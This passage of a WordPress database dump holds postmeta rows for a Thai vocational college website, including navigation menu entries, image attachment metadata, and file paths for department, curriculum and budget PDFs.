(4778, 1312, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4779, 1312, '_menu_item_xfn', ''),
(4780, 1312, '_menu_item_url', '#'),
(4782, 1313, '_menu_item_type', 'custom'),
(4783, 1313, '_menu_item_menu_item_parent', '1304'),
(4784, 1313, '_menu_item_object_id', '1313'),
(4785, 1313, '_menu_item_object', 'custom'),
(4786, 1313, '_menu_item_target', ''),
(4787, 1313, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4788, 1313, '_menu_item_xfn', ''),
(4789, 1313, '_menu_item_url', '#'),
(4791, 1314, '_menu_item_type', 'custom'),
(4792, 1314, '_menu_item_menu_item_parent', '1304'),
(4793, 1314, '_menu_item_object_id', '1314'),
(4794, 1314, '_menu_item_object', 'custom'),
(4795, 1314, '_menu_item_target', ''),
(4796, 1314, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4797, 1314, '_menu_item_xfn', ''),
(4798, 1314, '_menu_item_url', '#'),
(4800, 1315, '_menu_item_type', 'custom'),
(4801, 1315, '_menu_item_menu_item_parent', '1305'),
(4802, 1315, '_menu_item_object_id', '1315'),
(4803, 1315, '_menu_item_object', 'custom'),
(4804, 1315, '_menu_item_target', ''),
(4805, 1315, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4806, 1315, '_menu_item_xfn', ''),
(4807, 1315, '_menu_item_url', '#'),
(4809, 1316, '_menu_item_type', 'custom'),
(4810, 1316, '_menu_item_menu_item_parent', '1305'),
(4811, 1316, '_menu_item_object_id', '1316'),
(4812, 1316, '_menu_item_object', 'custom'),
(4813, 1316, '_menu_item_target', ''),
(4814, 1316, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4815, 1316, '_menu_item_xfn', ''),
(4816, 1316, '_menu_item_url', '#'),
(4818, 1317, '_menu_item_type', 'custom'),
(4819, 1317, '_menu_item_menu_item_parent', '1306'),
(4820, 1317, '_menu_item_object_id', '1317'),
(4821, 1317, '_menu_item_object', 'custom'),
(4822, 1317, '_menu_item_target', ''),
(4823, 1317, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4824, 1317, '_menu_item_xfn', ''),
(4825, 1317, '_menu_item_url', '#'),
(4827, 1307, '_publicize_pending', '1'),
(4828, 1308, '_publicize_pending', '1'),
(4829, 1309, '_publicize_pending', '1'),
(4830, 1310, '_publicize_pending', '1'),
(4831, 1311, '_publicize_pending', '1'),
(4832, 1312, '_publicize_pending', '1'),
(4833, 1313, '_publicize_pending', '1'),
(4834, 1314, '_publicize_pending', '1'),
(4835, 1315, '_publicize_pending', '1'),
(4836, 1316, '_publicize_pending', '1'),
(4837, 1317, '_publicize_pending', '1'),
(4838, 1318, '_menu_item_type', 'custom'),
(4839, 1318, '_menu_item_menu_item_parent', '0'),
(4840, 1318, '_menu_item_object_id', '1318'),
(4841, 1318, '_menu_item_object', 'custom'),
(4842, 1318, '_menu_item_target', ''),
(4843, 1318, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4844, 1318, '_menu_item_xfn', ''),
(4845, 1318, '_menu_item_url', '#'),
(4847, 1318, '_publicize_pending', '1'),
(4848, 1319, '_menu_item_type', 'custom'),
(4849, 1319, '_menu_item_menu_item_parent', '1318'),
(4850, 1319, '_menu_item_object_id', '1319'),
(4851, 1319, '_menu_item_object', 'custom'),
(4852, 1319, '_menu_item_target', ''),
(4853, 1319, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4854, 1319, '_menu_item_xfn', ''),
(4855, 1319, '_menu_item_url', '#'),
(4857, 1320, '_menu_item_type', 'custom'),
(4858, 1320, '_menu_item_menu_item_parent', '1318'),
(4859, 1320, '_menu_item_object_id', '1320'),
(4860, 1320, '_menu_item_object', 'custom'),
(4861, 1320, '_menu_item_target', ''),
(4862, 1320, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4863, 1320, '_menu_item_xfn', ''),
(4864, 1320, '_menu_item_url', '#'),
(4866, 1321, '_menu_item_type', 'custom'),
(4867, 1321, '_menu_item_menu_item_parent', '1318'),
(4868, 1321, '_menu_item_object_id', '1321'),
(4869, 1321, '_menu_item_object', 'custom'),
(4870, 1321, '_menu_item_target', ''),
(4871, 1321, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4872, 1321, '_menu_item_xfn', ''),
(4873, 1321, '_menu_item_url', '#'),
(4875, 1322, '_menu_item_type', 'custom'),
(4876, 1322, '_menu_item_menu_item_parent', '1318'),
(4877, 1322, '_menu_item_object_id', '1322'),
(4878, 1322, '_menu_item_object', 'custom'),
(4879, 1322, '_menu_item_target', ''),
(4880, 1322, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4881, 1322, '_menu_item_xfn', ''),
(4882, 1322, '_menu_item_url', '#'),
(4884, 1323, '_menu_item_type', 'custom'),
(4885, 1323, '_menu_item_menu_item_parent', '1318'),
(4886, 1323, '_menu_item_object_id', '1323'),
(4887, 1323, '_menu_item_object', 'custom'),
(4888, 1323, '_menu_item_target', ''),
(4889, 1323, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4890, 1323, '_menu_item_xfn', ''),
(4891, 1323, '_menu_item_url', '#'),
(4893, 1324, '_menu_item_type', 'custom'),
(4894, 1324, '_menu_item_menu_item_parent', '1318'),
(4895, 1324, '_menu_item_object_id', '1324'),
(4896, 1324, '_menu_item_object', 'custom'),
(4897, 1324, '_menu_item_target', ''),
(4898, 1324, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4899, 1324, '_menu_item_xfn', ''),
(4900, 1324, '_menu_item_url', '#'),
(4902, 1319, '_publicize_pending', '1'),
(4903, 1320, '_publicize_pending', '1'),
(4904, 1321, '_publicize_pending', '1'),
(4905, 1322, '_publicize_pending', '1'),
(4906, 1323, '_publicize_pending', '1'),
(4907, 1324, '_publicize_pending', '1'),
(4912, 1332, '_wp_attached_file', '2018/02/23-2-2561-14-33-47.jpg'),
(4913, 1332, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:640;s:6:\"height\";i:431;s:4:\"file\";s:30:\"2018/02/23-2-2561-14-33-47.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"23-2-2561-14-33-47-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"23-2-2561-14-33-47-300x202.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:202;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"23-2-2561-14-33-47-400x269.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4914, 1337, '_edit_lock', '1519377413:4'),
(4915, 1337, '_edit_last', '4'),
(4917, 1339, '_wp_attached_file', '2018/02/ประกาศเปิดปิด-12561-1.pdf'),
(4921, 1337, '_hide_featured', NULL),
(4922, 1337, '_wpas_done_all', '1'),
(4923, 1337, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575659055;s:7:\"payload\";a:0:{}}}'),
(4928, 1344, '_wp_attached_file', '2018/02/26-2-2561-11-53-08.jpg'),
(4929, 1344, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1140;s:6:\"height\";i:704;s:4:\"file\";s:30:\"2018/02/26-2-2561-11-53-08.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"26-2-2561-11-53-08-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"26-2-2561-11-53-08-300x185.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:185;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"26-2-2561-11-53-08-768x474.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:474;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"26-2-2561-11-53-08-1024x632.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:632;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"26-2-2561-11-53-08-400x247.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:247;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4930, 1345, '_wp_attached_file', '2018/02/26-2-2561-11-50-09.jpg'),
(4931, 1345, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:502;s:6:\"height\";i:335;s:4:\"file\";s:30:\"2018/02/26-2-2561-11-50-09.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"26-2-2561-11-50-09-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"26-2-2561-11-50-09-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"26-2-2561-11-50-09-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4932, 1346, '_wp_attached_file', '2018/02/26-2-2561-11-51-09.jpg'),
(4933, 1346, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:987;s:6:\"height\";i:571;s:4:\"file\";s:30:\"2018/02/26-2-2561-11-51-09.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"26-2-2561-11-51-09-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"26-2-2561-11-51-09-300x174.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"26-2-2561-11-51-09-768x444.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:444;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"26-2-2561-11-51-09-400x231.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:231;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4934, 1347, '_wp_attached_file', '2018/02/26-2-2561-11-54-39.jpg'),
(4935, 1347, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:712;s:6:\"height\";i:728;s:4:\"file\";s:30:\"2018/02/26-2-2561-11-54-39.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"26-2-2561-11-54-39-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"26-2-2561-11-54-39-293x300.jpg\";s:5:\"width\";i:293;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"26-2-2561-11-54-39-293x300.jpg\";s:5:\"width\";i:293;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4936, 1348, '_wp_attached_file', '2018/02/26-2-2561-11-55-38.jpg'),
(4937, 1348, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:581;s:6:\"height\";i:159;s:4:\"file\";s:30:\"2018/02/26-2-2561-11-55-38.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"26-2-2561-11-55-38-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"26-2-2561-11-55-38-300x82.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:82;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"26-2-2561-11-55-38-400x109.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:109;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4938, 1350, '_wp_attached_file', '2018/02/Detail-of-durable-articles-1-object.pdf'),
(4939, 1351, '_edit_lock', '1519629360:3'),
(4940, 1351, '_edit_last', '3'),
(4944, 1351, '_hide_featured', NULL),
(4945, 1351, '_wpas_done_all', '1'),
(4950, 1351, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574767620;s:7:\"payload\";a:0:{}}}'),
(4951, 1354, '_edit_lock', '1548837957:3'),
(4952, 1354, '_edit_last', '3'),
(4955, 1354, '_publicize_pending', '1'),
(4956, 1354, '_hide_featured', NULL),
(4966, 1368, '_wp_attached_file', '2018/02/ข้อมูลบุคคลากร2560.pdf'),
(4967, 1370, '_edit_lock', '1520308524:1'),
(4968, 1370, '_edit_last', '3'),
(4973, 1370, '_hide_featured', NULL),
(4974, 1370, '_wpas_done_all', '1'),
(4977, 1370, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575630475;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4701;}i:1;a:1:{s:2:\"id\";i:3954;}i:2;a:1:{s:2:\"id\";i:5769;}}}}'),
(4978, 1374, '_edit_lock', '1520327797:3'),
(4979, 1374, '_edit_last', '3'),
(4984, 1374, '_hide_featured', NULL),
(4985, 1374, '_wpas_done_all', '1'),
(4986, 1374, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575409295;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4662;}i:1;a:1:{s:2:\"id\";i:4172;}i:2;a:1:{s:2:\"id\";i:4006;}}}}'),
(4995, 1384, '_edit_lock', '1519714434:3'),
(4996, 1384, '_edit_last', '3'),
(4997, 1385, '_wp_attached_file', '2018/02/การประเมินผลกิจกรรมนักเรียน.-2-2560.pdf'),
(5001, 1384, '_hide_featured', NULL),
(5002, 1384, '_wpas_done_all', '1'),
(5003, 1384, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575117481;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5026;}i:1;a:1:{s:2:\"id\";i:6119;}i:2;a:1:{s:2:\"id\";i:4765;}}}}'),
(5004, 1387, '_edit_lock', '1519718663:3'),
(5005, 1387, '_edit_last', '3'),
(5006, 1388, '_wp_attached_file', '2018/02/หลักสูตร-ปวช..pdf'),
(5008, 1390, '_wp_attached_file', '2018/02/หลักสูตร-ป.ตรี.pdf'),
(5009, 1387, '_publicize_pending', '1'),
(5010, 1387, '_hide_featured', NULL),
(5012, 1394, '_wp_attached_file', '2018/02/หลักสูตร-ปวส.pdf'),
(5013, 1396, '_wp_attached_file', '2018/02/ข้อมูลบุคคลากร2560-1.pdf'),
(5014, 1399, '_edit_lock', '1550818926:3'),
(5015, 1399, '_edit_last', '3'),
(5016, 1400, '_wp_attached_file', '2018/02/แผนกวิชาก่อสร้าง.pdf'),
(5017, 1401, '_wp_attached_file', '2018/02/แผนกวิชาเคมีอุตสาหกรรม.pdf'),
(5018, 1402, '_wp_attached_file', '2018/02/แผนกวิชาเครื่องมือวัดและควบคุม.pdf'),
(5019, 1403, '_wp_attached_file', '2018/02/แผนกวิชาช่างกล.pdf'),
(5020, 1404, '_wp_attached_file', '2018/02/แผนกวิชาช่างเชื่อม.pdf'),
(5021, 1405, '_wp_attached_file', '2018/02/แผนกวิชาช่างยนต์.pdf'),
(5022, 1406, '_wp_attached_file', '2018/02/แผนกวิชาเทคโนโลยียาง.pdf'),
(5023, 1407, '_wp_attached_file', '2018/02/แผนกวิชาปิโตรเคมี.pdf'),
(5024, 1408, '_wp_attached_file', '2018/02/แผนกวิชาไฟฟ้า.pdf'),
(5025, 1409, '_wp_attached_file', '2018/02/แผนกวิชาอิเล็กทรอนิกส์.pdf'),
(5026, 1399, '_publicize_pending', '1'),
(5027, 1399, '_hide_featured', NULL),
(5028, 1413, '_wp_attached_file', '2018/02/กำหนดการพิธีรับใบประกาศนียบัตร-2560.pdf'),
(5031, 1416, '_wp_attached_file', '2018/02/แผนกวิชาการบัญชี.pdf'),
(5032, 1417, '_wp_attached_file', '2018/02/แผนกวิชาการเลขานุการ.pdf'),
(5033, 1418, '_wp_attached_file', '2018/02/แผนกวิชาคอมพิวเตอร์ธุรกิจ.pdf'),
(5034, 1419, '_wp_attached_file', '2018/02/แผนกวิชาโลจิสติกส์.pdf'),
(5035, 1420, '_wp_attached_file', '2018/02/แผนกวิชาการตลาด.pdf'),
(5036, 1423, '_wp_attached_file', '2018/02/แผนกวิชาผ้าและเครื่องแต่งกาย.pdf'),
(5037, 1424, '_wp_attached_file', '2018/02/แผนกวิชาอาหารและโภชนาการ.pdf'),
(5038, 1425, '_wp_attached_file', '2018/02/แผนกวิชาคหกรรมศาสตร์.pdf'),
(5039, 1427, '_wp_attached_file', '2018/02/แผนกวิชาการท่องเที่ยว.pdf'),
(5040, 1428, '_wp_attached_file', '2018/02/แผนกวิชาการโรงแรม.pdf'),
(5041, 1429, '_wp_attached_file', '2018/02/แผนกวิชา-Central-Lab.pdf'),
(5042, 1430, '_wp_attached_file', '2018/02/แผนกวิชาเทคโนโลยีสารสนเทศ.pdf'),
(5043, 1431, '_wp_attached_file', '2018/02/หมวดคณิตศาสตร์.pdf'),
(5044, 1432, '_wp_attached_file', '2018/02/หมวดพลานามัย.pdf'),
(5045, 1433, '_wp_attached_file', '2018/02/หมวดภาษาไทย.pdf'),
(5046, 1434, '_wp_attached_file', '2018/02/หมวดภาษาอังกฤษ.pdf'),
(5047, 1435, '_wp_attached_file', '2018/02/หมวดวิทยาศาสตร์.pdf'),
(5048, 1436, '_wp_attached_file', '2018/02/หมวดสังคมศึกษา.pdf'),
(5049, 1439, '_menu_item_type', 'custom'),
(5050, 1439, '_menu_item_menu_item_parent', '0'),
(5051, 1439, '_menu_item_object_id', '1439'),
(5052, 1439, '_menu_item_object', 'custom'),
(5053, 1439, '_menu_item_target', ''),
(5054, 1439, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(5055, 1439, '_menu_item_xfn', ''),
(5056, 1439, '_menu_item_url', '#'),
(5058, 1440, '_menu_item_type', 'custom'),
(5059, 1440, '_menu_item_menu_item_parent', '0'),
(5060, 1440, '_menu_item_object_id', '1440'),
(5061, 1440, '_menu_item_object', 'custom'),
(5062, 1440, '_menu_item_target', ''),
(5063, 1440, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(5064, 1440, '_menu_item_xfn', ''),
(5065, 1440, '_menu_item_url', '/%E0%B8%82%E0%B8%B1%E0%B9%89%E0%B8%99%E0%B8%95%E0%B8%AD%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%9B%E0%B8%A5%E0%B8%B5%E0%B9%88%E0%B8%A2%E0%B8%99-password/'),
(5067, 1440, '_publicize_pending', '1'),
(5068, 1439, '_publicize_pending', '1'),
(5069, 1441, '_edit_lock', '1519806390:3'),
(5070, 1441, '_edit_last', '3'),
(5071, 1442, '_wp_attached_file', '2018/02/ขั้นตอนการสมัครเรียน.pdf'),
(5075, 1441, '_hide_featured', NULL),
(5076, 1441, '_wpas_done_all', '1'),
(5081, 1441, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575464328;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5291;}i:1;a:1:{s:2:\"id\";i:4964;}i:2;a:1:{s:2:\"id\";i:4632;}}}}'),
(5082, 1445, '_edit_lock', '1548817279:3'),
(5083, 1445, '_edit_last', '3'),
(5084, 1446, '_wp_attached_file', '2018/02/ประมาณการรายรับ-รายจ่าย-2561.pdf'),
(5085, 1447, '_wp_attached_file', '2018/02/แผนการใช้จ่ายเงินตามแผนปฏิบัติการ-2561.pdf'),
(5086, 1445, '_publicize_pending', '1'),
(5087, 1445, '_hide_featured', NULL),
(5088, 1451, '_edit_lock', '1636344406:14'),
(5089, 1451, '_edit_last', '14'),
(5090, 1452, '_wp_attached_file', '2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg'),
(5091, 1452, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:517;s:6:\"height\";i:143;s:4:\"file\";s:82:\"2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:82:\"นายกิตติพงค์-อุตตมะเวทิน-150x143.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:143;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:81:\"นายกิตติพงค์-อุตตมะเวทิน-300x83.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:83;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:82:\"นายกิตติพงค์-อุตตมะเวทิน-400x111.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:111;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5094, 1454, '_wp_attached_file', '2018/03/5-3-2561-10-23-29.jpg'),
(5095, 1454, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:190;s:6:\"height\";i:238;s:4:\"file\";s:29:\"2018/03/5-3-2561-10-23-29.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"5-3-2561-10-23-29-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5096, 1451, '_hide_featured', NULL),
(5097, 1456, '_wp_attached_file', '2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg'),
(5098, 1456, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:580;s:6:\"height\";i:162;s:4:\"file\";s:94:\"2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:94:\"นางรุจิรดานันท์-พันกาฬสินธุ์-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:93:\"นางรุจิรดานันท์-พันกาฬสินธุ์-300x84.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:94:\"นางรุจิรดานันท์-พันกาฬสินธุ์-400x112.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:112;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5111, 1451, '_publicize_pending', '1'),
(5114, 1467, '_wp_attached_file', '2018/03/5-3-2561-11-04-59.jpg'),
(5115, 1467, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:582;s:6:\"height\";i:161;s:4:\"file\";s:29:\"2018/03/5-3-2561-11-04-59.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"5-3-2561-11-04-59-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"5-3-2561-11-04-59-300x83.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:83;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"5-3-2561-11-04-59-400x111.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:111;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
